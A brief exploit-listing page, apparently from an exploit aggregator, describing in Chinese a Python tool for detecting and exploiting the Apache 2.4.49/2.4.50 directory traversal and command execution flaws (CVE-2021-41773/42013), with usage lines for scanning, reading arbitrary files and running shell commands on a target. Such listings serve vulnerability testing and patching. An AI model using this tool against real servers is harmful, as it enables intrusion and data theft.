Share
## https://sploitus.com/exploit?id=9D511461-7D24-5402-8E2A-58364D6E758F
用于检测/利用Apache 2.4.49与2.4.50上的目录穿越/命令执行漏洞


使用:

漏洞检测:python3 CVE-2021-41773-42013.py  -u url 

读取文件: python3 CVE-2021-41773-42013.py  -u url -m read -f filepath

执行命令:python3 CVE-2021-41773-42013.py  -u url -m exec -c command -s shell(默认/bin/sh)